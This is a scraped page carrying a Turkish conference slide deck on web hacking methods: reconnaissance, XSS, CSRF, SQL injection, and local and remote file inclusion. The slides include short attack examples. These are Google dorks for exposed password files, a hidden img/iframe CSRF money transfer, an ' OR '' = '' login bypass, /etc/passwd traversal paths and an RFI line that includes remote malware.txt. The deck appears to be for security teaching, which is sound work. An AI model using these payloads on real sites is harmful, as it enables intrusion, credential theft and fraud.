Sql Injection Sql Injection
Sql Injection
 
Siber Guvenlik ve Etik Hhacking -2-
Siber Guvenlik ve Etik Hhacking -2-Siber Guvenlik ve Etik Hhacking -2-
Siber Guvenlik ve Etik Hhacking -2-
 
Web servisi güvenliği
Web servisi güvenliğiWeb servisi güvenliği
Web servisi güvenliği
 
Gazi Universitesi Bilisim Gunleri '09
Gazi Universitesi Bilisim Gunleri '09Gazi Universitesi Bilisim Gunleri '09
Gazi Universitesi Bilisim Gunleri '09
 
Burp Suite İle File Upload Attack | OWASP Istanbul
Burp Suite İle File Upload Attack | OWASP Istanbul Burp Suite İle File Upload Attack | OWASP Istanbul
Burp Suite İle File Upload Attack | OWASP Istanbul
 
Temel web güvenliği
Temel web güvenliğiTemel web güvenliği
Temel web güvenliği
 
Siber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin Kullanımı
Siber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin KullanımıSiber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin Kullanımı
Siber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin Kullanımı
 
CRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİ
CRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİCRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİ
CRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİ
 
CRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİ
CRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİCRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİ
CRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİ
 
Client-Side Security & csp - Mehmet İnce #SiberGuvenlikKonferansi 14.05.14
Client-Side Security & csp - Mehmet İnce #SiberGuvenlikKonferansi 14.05.14Client-Side Security & csp - Mehmet İnce #SiberGuvenlikKonferansi 14.05.14
Client-Side Security & csp - Mehmet İnce #SiberGuvenlikKonferansi 14.05.14
 
PHPkonf'15 - PHP Uygulamanızı Güçlendirin
PHPkonf'15 - PHP Uygulamanızı GüçlendirinPHPkonf'15 - PHP Uygulamanızı Güçlendirin
PHPkonf'15 - PHP Uygulamanızı Güçlendirin
 
Ozgur web teknolojileri'13
Ozgur web teknolojileri'13Ozgur web teknolojileri'13
Ozgur web teknolojileri'13
 
Spring&IOC-DC
Spring&IOC-DCSpring&IOC-DC
Spring&IOC-DC
 
Balkanay Web Sunum
Balkanay Web SunumBalkanay Web Sunum
Balkanay Web Sunum
 
Web Uygulama Pentest Eğitimi
Web Uygulama Pentest EğitimiWeb Uygulama Pentest Eğitimi
Web Uygulama Pentest Eğitimi
 

Web Guvenligi Konferansi - Web Hacking Yontemleri

  • 2. Bilgi Teknolojileri Güvenlik Danışmanı • White Hat Hacker • Ethical Hacking Eğitmeni • Blog Yazarı (www.eyupcelik.com.tr) • Web Güvenliği Editörü (www.webguvenligi.net) • LabSec Community - Güvenlik Ekip Lideri • Anatolia Security - Proje Takım Lideri • Güvenlik Araştırmacısı (Security Research) – PacketStormSecurity.org – Exploit-db.com – Secunia.com
  • 3. Web Hacking Yöntemleri • Bilgi Toplama • Web Sunucusu, Uygulama, Yazılım Dili, Versiyon Keşfi • Hata Mesajlarından Bilgi Toplama • Arama Motorlarından Bilgi Toplama • Alt Dizin ve Admin Panel Keşfi • Web Güvenlik Testlerinde Kişisel Proxyler • OWASP Top 10 Açıklık Rehberi • XSS, CSRF Açıkları ve Kötüye Kullanımı • XSS, CSRF Nedir? • XSS, CSRF Kullanımı • SQL Injection Zafiyetleri ve Hacking Amaçlı Kullanımları • SQL Injection ve Blind SQL Injection Nedir? • SQL – Blind SQL Kullanımı • SQL Injection Örnekleri • Arama Motorlarından Zafiyet Arama • Havij, Sqlmap, SQL Finder, Pangolin • File Inclusion Zafiyetleri ve Hacking Amaçlı Kullanımları • Local File Inclusion (LFI) • Remote File Inclusion (RFI) • Web Shell • Web Shell Kavramları ve Kullanım Amaçları • PHP, ASP, JSP, ASP.NET Shell Çeşitleri
  • 7.
  • 8. Sık karşılaşılan hata kodları • 400 (Söz dizimi çözülemedi) • 403 (Yasak) • 404 (Bulunamadı) • 405 (Yönteme izin verilmiyor) • 500 (Dahili sunucu hatası) • 505 (HTTP sürümü desteklenmiyor)
  • 9. • www.archive.org (Web Arşiv) • www.google.com • site: eyupcelik.com.tr • Filetype:txt • Password 123123 filetype:xml • Password 123123 filetype:xml site:site.com.tr • intitle:index.of • Intitle:index.of site:gov.tr • intitle:index.of pwd.db passwd site:com • Microsoft-IIS/5.0 server at • Apache/2.2 Server at • www.bing.com • IP: 192.168.1.100 • Kariyer Siteleri • (Kariyer.net, yenibiris.com. SecretCV)
  • 10.
  • 11.
  • 12. Web Hacking Yöntemleri • Bilgi Toplama • Web Sunucusu, Uygulama, Yazılım Dili, Versiyon Keşfi • Hata Mesajlarından Bilgi Toplama • Arama Motorlarından Bilgi Toplama • Alt Dizin ve Admin Panel Keşfi • Web Güvenlik Testlerinde Kişisel Proxyler • OWASP Top 10 Açıklık Rehberi • XSS, CSRF Açıkları ve Kötüye Kullanımı • XSS, CSRF Nedir? • XSS, CSRF Kullanımı • SQL Injection Zafiyetleri ve Hacking Amaçlı Kullanımları • SQL Injection ve Blind SQL Injection Nedir? • SQL – Blind SQL Kullanımı • SQL Injection Örnekleri • Arama Motorlarından Zafiyet Arama • Havij, Sqlmap, SQL Finder, Pangolin • File Inclusion Zafiyetleri ve Hacking Amaçlı Kullanımları • Local File Inclusion (LFI) • Remote File Inclusion (RFI) • Web Shell • Web Shell Kavramları ve Kullanım Amaçları • PHP, ASP, JSP, ASP.NET Shell Çeşitleri
  • 13.
  • 14. Sunucuya gönderilen yazılım betiklerinin (script) kullanıcının tarayıcısında çalıştığı bir saldırı türüdür. • PHP-ASP-ASP.NET Sayfalarında sıklıkla görülür. • Genellikle POST ve GET metotlarının kullanıldığı alanlarda olur. • Yazılım betiklerinin kullanıcı tarafında çalıştırılması sonucunda oturum bilgileri çalınabilir, bilgisayarına zararlı kodlar enjekte edilebilir ve bilgisayar yönetimi ele geçirilebilir. • En çok karşılaşılan güvenlik zafiyetidir!
  • 15. • XSS • Reflected XSS Attack • Stored (Persistent) XSS Attack
  • 16. URL adreslerindeki querystringler ve form alanlarında sıklıkla görülür. • En çok karşılaşılan XSS saldırı türevidir. • Kullanıcı taraflı çalışır. • Phishing saldırılarına zemin oluşturur.
  • 17. • Forumlar, ziyaretçi defterleri gibi alanlarda sıklıkla görülür. • XSS kodları database sunucusuna kaydedilir. • Kullanıcılar sayfaya eriştiklerinde XSS kodları çalışır ve amaca hizmet eder.
  • 18. • XSS saldırısına benzer • Web uygulamasının oturum zaman aşımlarını kullanmamasından kaynaklanır. • XSS saldırılarının aksine CSRF saldırıları kullanıcı bazlıdır. • Bu saldırı türünde, kullanıcının isteği dışında kullanıcıya işlemler yaptırılır. • Banka hesaplarından para transferi, uygulama yetki yükseltme saldırıları gibi bir çok işlem bu saldırı yöntemi ile yapılabilmektedir. • Saldırganın amacı; yetkisi olmayan alanlarda istediği işlemi yetkisi olan bir kullanıcıya yaptırmaktır. • Örneğin; ING Direct bankasında bulunan CSRF zafiyeti, kullanıcının belirtilen hesaba para transfer etmesini sağlamaktaydı.
  • 19. • Web sitesinde oturum açan bir kullanıcı, eğer aynı zamanda zararlı kodun bulunduğu sayfaya erişirse, hesabından başka bir hesaba para aktarılıyor • Kullanıcı uygulamayı açtıktan sonra, zararlı sayfada http://www.banka.com/ParaYollar.php?Gonderen=Eyup&Alici=Ismail&Miktar=500 &submit=1 kodu çalıştırılır. • Bunun için saldırgan yukarıda bulunan kodu sayfasında <img> veya <iframe> tagları arasına yerleştirir. • Bu tagler kullanıcının görmemesi için <img src=‚http://www.banka.com/ParaYollar.php?Gonderen=Eyup&Alici=Ismail&Miktar=500&submit=1‛ width=‚0‛ height=‚0‛> şeklinde yada <iframe src=‚http://www.banka.com/ParaYollar.php?Gonderen=Eyup&Alici=Ismail&Miktar=500&submit=1‛ width=‚0‛ height=‚0‛> şeklinde olacaktır. • Bu kodlar kullanıcı tarafında çalışınca, Eyup adlı kullanıcın hesabından Ismail adlı kullanıcın hesabına 500 TL aktarmış olacaktır.
  • 20. Web Hacking Yöntemleri • Bilgi Toplama • Web Sunucusu, Uygulama, Yazılım Dili, Versiyon Keşfi • Hata Mesajlarından Bilgi Toplama • Arama Motorlarından Bilgi Toplama • Alt Dizin ve Admin Panel Keşfi • Web Güvenlik Testlerinde Kişisel Proxyler • OWASP Top 10 Açıklık Rehberi • XSS, CSRF Açıkları ve Kötüye Kullanımı • XSS, CSRF Nedir? • XSS, CSRF Kullanımı • SQL Injection Zafiyetleri ve Hacking Amaçlı Kullanımları • SQL Injection ve Blind SQL Injection Nedir? • SQL – Blind SQL Kullanımı • SQL Injection Örnekleri • Arama Motorlarından Zafiyet Arama • Havij, Sqlmap, SQL Finder, Pangolin • File Inclusion Zafiyetleri ve Hacking Amaçlı Kullanımları • Local File Inclusion (LFI) • Remote File Inclusion (RFI) • Web Shell • Web Shell Kavramları ve Kullanım Amaçları • PHP, ASP, JSP, ASP.NET Shell Çeşitleri
  • 21. • Veritabanından sorgulamalar yapılırken, sorgulara bazı karakterlerin (‘) eklenerek yetkisiz sorgulamalar yapılmasıdır. • SQL injection yöntemi ile sql sunucusunda bulunan verilere erişilebilir, değiştirilebilir , silinebilir • SQL Injection son zamanlarda en tehlikeli saldırı türlerinden biri haline geldi. • Web uygulamalarında bulunan SQL sorgularının doğru bir şekilde analiz edilmeden SQL sunucusuna aktarılmasından kaynaklanan bir saldırı türüdü • SQL’de iki tek tırnak (‘) yan yana gelince arada bulunan kodlar ‚string‛ olarak kabul edilir. • Örneğin; bir userın form alanına giriş yapacağı zaman girmiş olduğu input değerler kontrol edilirken sql cümlecikleri kullanılır. • SELECT * from kullanicilar where isim=‘eyup’ and sifre=‘x9x9’ • Böyle bir durumda, kullanıcılar tablosunda bulunan isim kolonunda ‚eyup‛ varsa ve sifre kolonıundaki şifresi de eğer ‚x9x9‛ ise kullanıcı oturum açmış olacaktır. • Kullanıcının form alanına girmiş olduğu input veriler where koşuluna atanmaktadır.
  • 22. • Bu mantıkla çalışan bir sitede sql injection saldırısı yapacaksak eğer, bize kullanıcı adı ve şifreyi her zaman döndürecek bir koda ihityacımız olacaktır. • Select * from kullanicilar where isim=‘’ OR ‘’ = ‘’ and sifre= ‘’ OR ‘’ = ‘’ • Kullanıcılar tablosundaki isim kolonu ve sifre kolonu boş olan kullanıcıları istemiş olduk.
  • 23. • ODBC (Open Database Connectivity) verikaynakları üzerinde veri taşımaya yarayan bir araçtır. • Bu işlemi verikaynağı ve uygulama arasında bir katman oluşturarak gerçekleştirir. • Error Based SQL Injection saldırıları, ODBC’nin verdiği hatalardan faydalanarak verilere erişmeye çalışır. • Çoğunlukla SQL Union operatöründen faydalanılarak bu hata verilerine erişilir.
  • 24. • SQL injectionda kullanılan karakterlerin sonuç vermediği durumlarda kullanılan bir saldırı yöntemidir. • Bu yöntem alınan hataların True veya False kısmı ile ilgilenir. • SQL üzerinde yapılan sorgulamaların doğru veya yanlış olduğu sonuçlarını bize geri döndürür. • Blind SQL Injection ile yapılan yöntemler deneme-yanılma yöntemi ile yapılır.
  • 25.
  • 26.
  • 27.
  • 28. Web Hacking Yöntemleri • Bilgi Toplama • Web Sunucusu, Uygulama, Yazılım Dili, Versiyon Keşfi • Hata Mesajlarından Bilgi Toplama • Arama Motorlarından Bilgi Toplama • Alt Dizin ve Admin Panel Keşfi • Web Güvenlik Testlerinde Kişisel Proxyler • OWASP Top 10 Açıklık Rehberi • XSS, CSRF Açıkları ve Kötüye Kullanımı • XSS, CSRF Nedir? • XSS, CSRF Kullanımı • SQL Injection Zafiyetleri ve Hacking Amaçlı Kullanımları • SQL Injection ve Blind SQL Injection Nedir? • SQL – Blind SQL Kullanımı • SQL Injection Örnekleri • Arama Motorlarından Zafiyet Arama • Havij, Sqlmap, SQL Finder, Pangolin • File Inclusion Zafiyetleri ve Hacking Amaçlı Kullanımları • Local File Inclusion (LFI) • Remote File Inclusion (RFI) • Web Shell • Web Shell Kavramları ve Kullanım Amaçları • PHP, ASP, JSP, ASP.NET Shell Çeşitleri
  • 29. Web sitesinde bulunan kodlama hatalarından (include, require) meydana gelir • Sunucuda bulunan dosyaların çağrılmasına ve okunabilmesine olanak verir • Sadece bulunduğu siteyi değil, sunucuda bulunan tüm siteleri etkileyebilir! • index.php?SayfaAc=iletisim.php • index.php?SayfaAc=../../configuration.php • index.php?SayfaAc=../../../../etc/passwd • index.php?SayfaAc=../../../boot.ini
  • 30. • Web sitesinde bulunan kodlama hatalarından (include, require) meydana gelir • RFI saldırılarında en büyük etken değişkene değer atanmamasıdır! • Tanımlanmış ancak değer atanmamış olan değişkene dışardan değer aktarılması ile oluşur. • Sadece bulunduğu siteyi değil, sunucuda bulunan tüm siteleri etkileyebilir! • include($deger‛.php‛) • index.php?deger=http://www.site.com/malware.txt